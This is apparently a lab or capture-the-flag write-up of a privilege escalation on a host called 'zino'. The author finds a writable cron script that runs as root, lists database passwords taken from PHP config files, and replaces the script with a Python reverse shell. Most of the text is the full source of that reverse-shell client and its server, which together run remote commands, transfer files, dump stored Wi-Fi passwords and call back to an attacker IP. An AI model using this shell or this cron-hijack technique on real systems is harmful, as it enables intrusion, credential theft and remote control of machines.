Priv Escalation
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/3 * * * * root python /var/www/html/booked/cleanup.pyCron job running as root.
╔══════════╣ Searching passwords in config PHP files
$conf['settings']['database']['password'] = 'password';
$conf['settings']['password']['minimum.letters'] = '6';
$conf['settings']['password']['minimum.numbers'] = '0';
$conf['settings']['password']['upper.and.lower'] = 'false';
$conf['settings']['database']['password'] = 'RoachSmallDudgeon368';
$conf['settings']['password']['minimum.letters'] = '6';
$conf['settings']['password']['minimum.numbers'] = '0';
$conf['settings']['password']['upper.and.lower'] = 'false';
I can edit the cronjob.
www-data@zino:/var/www/html/booked$ echo "lol" >>cleanup.py
www-data@zino:/var/www/html/booked$ cat cleanup.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:
print 'ERROR...'
sys.exit(0)
lol
Replaced the python file with a python3 reverse shell.
www-data@zino:/tmp$ cat client.py > /var/www/html/booked/cleanup.pyThis is the client.py that I transferred, I do this with every python file that I can replace.
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################
# **python reverse shell**
# coded by: oseid Aldary
##############################
#Client_FILE
import struct,socket,subprocess,os,platform,webbrowser as browser
# server_config
IP = "192.168.49.100" # Your server IP, default: localhost
port = 8003 # #Your server Port, default: 4444
################
class senrev:
def __init__(self,sock):
self.sock = sock
def send(self, data):
pkt = struct.pack('>I', len(data)) + data
self.sock.sendall(pkt)
def recv(self):
pktlen = self.recvall(4)
if not pktlen: return ""
pktlen = struct.unpack('>I', pktlen)[0]
return self.recvall(pktlen)
def recvall(self, n):
packet = b''
while len(packet) < n:
frame = self.sock.recv(n - len(packet))
if not frame:return None
packet += frame
return packet
def cnet():
try:
ip = socket.gethostbyname("www.google.com")
con = socket.create_connection((ip,80), 2)
return True
except socket.error: pass
return False
def runCMD(cmd):
runcmd = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
return runcmd.stdout.read() + runcmd.stderr.read()
def upload(cmd):
filetosend = "".join(cmd.split(":download")).strip()
if not os.path.isfile(filetosend): controler.send("error: open: '{}': No such file on clinet machine !\n".format(filetosend).encode("UTF-8"))
else:
controler.send(b"true")
with open(filetosend, "rb") as wf:
for data in iter(lambda: wf.read(4100), b""):
try:controler.send(data)
except(KeyboardInterrupt,EOFError):
wf.close()
controler.send(b":Aborted:")
return
controler.send(b":DONE:")
def wifishow():
try:
if platform.system() == "Windows": info = runCMD("netsh wlan show profile name=* key=clear")
elif platform.system() == "Linux": info = runCMD("egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/*")
else: info = b":osnot:"
except Exception: info = b":osnot:"
finally: controler.send(info)
def download(cmd):
filetodown = "".join(cmd.split(":upload")).strip()
filetodown = filetodown.split("/")[-1] if "/" in filetodown else filetodown.split("\\")[-1] if "\\" in filetodown else filetodown
wf = open(filetodown, "wb")
while True:
data = controler.recv()
if data == b":DONE:":break
elif data == b":Aborted:":
wf.close()
os.remove(filetodown)
return
wf.write(data)
wf.close()
controler.send(str(os.getcwd()+os.sep+filetodown).encode("UTF-8"))
def browse(cmd):
url = "".join(cmd.split(":browse")).strip()
browser.open(url)
def shell(senrev=senrev):
global s
global controler
mainDIR = os.getcwd()
tmpdir=""
controler = senrev(s)
while True:
cmd = controler.recv()
if cmd.strip():
cmd = cmd.decode("UTF-8",'ignore').strip()
if ":download" in cmd:upload(cmd)
elif ":upload" in cmd:download(cmd)
elif cmd == ":kill":
s.shutdown(2)
s.close()
break
elif ":browse" in cmd: browse(cmd)
elif cmd == ":check_internet_connection":
if cnet() == True: controler.send(b"UP")
else: controler.send(b"Down")
elif cmd == ":wifi": wifishow()
elif "cd" in cmd:
dirc = "".join(cmd.split("cd")).strip()
if not dirc.strip() : controler.send("{}\n".format(os.getcwd()).encode("UTF-8"))
elif dirc == "-":
if not tmpdir: controler.send(b"error: cd: old [PAWD] not set yet !\n")
else:
tmpdir2 = os.getcwd()
os.chdir(tmpdir)
controler.send("Back to dir[ {}/ ]\n".format(tmpdir).encode("UTF-8"))
tmpdir = tmpdir2
elif dirc =="--":
tmpdir = os.getcwd()
os.chdir(mainDIR)
controler.send("Back to first dir[ {}/ ]\n".format(mainDIR).encode("UTF-8"))
else:
if not os.path.isdir(dirc): controler.send("error: cd: '{}': No such file or directory on clinet machine !\n".format(dirc).encode("UTF-8"))
else:
tmpdir = os.getcwd()
os.chdir(dirc)
controler.send("Changed to dir[ {}/ ]\n".format(dirc).encode("UTF-8"))
elif cmd == "pwd": controler.send(str(os.getcwd()+"\n").encode("UTF-8"))
else:
cmd_output = runCMD(cmd)
controler.send(bytes(cmd_output))
exit(1)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, port))
shell()
except Exception: exit(1)This is the server.
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################
# **python reverse shell**
# coded by: oseid Aldary
##############################
#Server_File
import socket,struct,sys,os;from datetime import datetime
try: input = raw_input
except NameError: input = input
class senrev:
def __init__(self,sock):
self.sock = sock
def send(self, data):
pkt = struct.pack('>I', len(data)) + data
self.sock.sendall(pkt)
def recv(self):
pktlen = self.recvall(4)
if not pktlen: return ""
pktlen = struct.unpack('>I', pktlen)[0]
return self.recvall(pktlen)
def recvall(self, n):
packet = b''
while len(packet) < n:
frame = self.sock.recv(n - len(packet))
if not frame:return None
packet += frame
return packet
def help():
print("""
Commands Desscription
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:help Show this help message
:download Download file from client machine
:upload Upload file to client machine
:kill Kill the connection with client machine
:exec Run external command
:check Check if client machine is connected to internet
:wifi Show Client machine wifi info [names,passwod,etc]
:browse Open an website on client machine browser
pwd Print working directory in client machine
cd - Switch back to previous directory in client machine
cd -- Switch back to first directory when connection was established with client machine
""")
def download(filee):
cmd = filee
filee = "".join(filee.split(":download")).strip()
if filee.strip():
filetodown = filee.split("/")[-1] if "/" in filee else filee.split("\\")[-1] if "\\" in filee else filee
controler.send(cmd.encode("UTF-8"))
down = controler.recv().decode("UTF-8",'ignore')
if down == "true":
print("[~] Downloading [ {} ]...".format(filetodown))
wf = open(filetodown, "wb")
while True:
data = controler.recv()
if data == b":DONE:": break
elif data == b":Aborted:":
wf.close()
os.remove(filetodown)
print("[!] Downloading Has Aborted By Client!")
return
wf.write(data)
wf.close()
print("[*] Download Complete :)\n[*] file Saved In : {}\n".format(os.getcwd()+os.sep+filetodown))
else: print(down)
else: print("Usage: :download <file_to_download_from_client_machine>\n")
def upload(cmd):
filetoup = "".join(cmd.split(":upload")).strip()
if not filetoup.strip(): print("usage: :upload <file_to_upload>\n")
else:
if not os.path.isfile(filetoup): print("error: open: no such file: "+filetoup+"\n")
else:
controler.send(cmd.encode("UTF-8"))
print("[~] Uploading [ {} ]...".format(filetoup))
with open(filetoup,"rb") as wf:
for data in iter(lambda: wf.read(4100), b""):
try:controler.send(data)
except(KeyboardInterrupt,EOFError):
wf.close()
controler.send(b":Aborted:")
print("[!] Uploading Has Been Aborted By User!\n")
return
controler.send(b":DONE:")
savedpath = controler.recv().decode("UTF-8")
print("[*] Upload Complete :)\n[*] File uploaded in : "+str(savedpath).strip()+" in client machine\n")
def check_con():
print("[~] Checking....")
controler.send(b":check_internet_connection")
status = controler.recv().decode("UTF-8").strip()
if status == "UP": print("[*] client: Connected to internet !\n")
else: print("[!] client: Not Connected to internet !\n")
def browse(cmd):
url = "".join(cmd.split(":browse")).strip()
if not url.strip(): print("Usage: :browse <Websute_URL>\n")
else:
if not url.startswith(("http://","https://")): url = "http://"+url
print("[~] Opening [ {} ]...".format(url))
controler.send(":browse {}".format(url).encode("UTF-8"))
print("[*] Done \n")
def control():
try:
cmd = str(input("[{}]:~# ".format(a[0])))
while not cmd.strip(): cmd = str(input("[{}]:~# ".format(a[0])))
if cmd == ":help":
help()
control()
elif ":download" in cmd:
download(cmd)
control()
elif ":upload" in cmd:
upload(cmd)
control()
elif cmd ==":kill":
print("[!] Connection has been killed!")
controler.send(b":kill")
c.shutdown(2)
c.close()
s.close()
exit(1)
elif ":exec" in cmd:
cmd = "".join(cmd.split(":exec")).strip()
if not cmd.strip(): print("Usage: :exec <command>\n")
else:
print("[*] exec:")
os.system(cmd)
print(" ")
control()
elif cmd == ":check":
check_con()
control()
elif cmd == ":wifi":
print("[*] Geting Wifi profiles info...")
controler.send(b":wifi")
info = controler.recv()
try:
info = info.decode("UTF-8","ignore")
except UnicodeEncodeError: info = info
finally:
if info==":osnot:": print("[!] Sorry, i can't found wifi info of client machine!\n")
else:
print("[*] INFO:\n")
print(info + "\n")
control()
elif ":browse" in cmd:
browse(cmd)
control()
elif cmd.lower() == "cls" or cmd == "clear":
os.system("cls||clear")
control()
controler.send(cmd.encode("UTF-8"))
DATA = controler.recv()
if DATA.strip(): print(DATA.decode("UTF-8",'ignore'))
control()
except (KeyboardInterrupt, EOFError):
print(" ")
control()
except socket.error:
print("[!] Connection Lost to: "+a[0]+" !")
c.close()
s.close()
exit(1)
except UnicodeEncodeError:
print(DATA)
print(" ")
control()
except Exception as e:
print("[!] An error occurred: "+str(e)+"\n")
control()
def server(IP,PORT,senrev=senrev):
global s
global c
global a
global controler
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((IP,PORT))
s.listen(1)
print("[*] Server started on > {}:{} < | at [{}]".format(IP,PORT,datetime.now().strftime("%H:%M:%S")))
try:
c,a = s.accept()
controler = senrev(c)
print("\n[*] Connection From {}:{}".format(a[0],a[1]))
print("[*] type ':help' to show help message\n")
control()
except (KeyboardInterrupt,EOFError):
print(" ")
exit(1)
if len(sys.argv) !=3:
print("Usage: python server.py <IP> <PORT>")
exit(1)
server(sys.argv[1],int(sys.argv[2]))Last updated
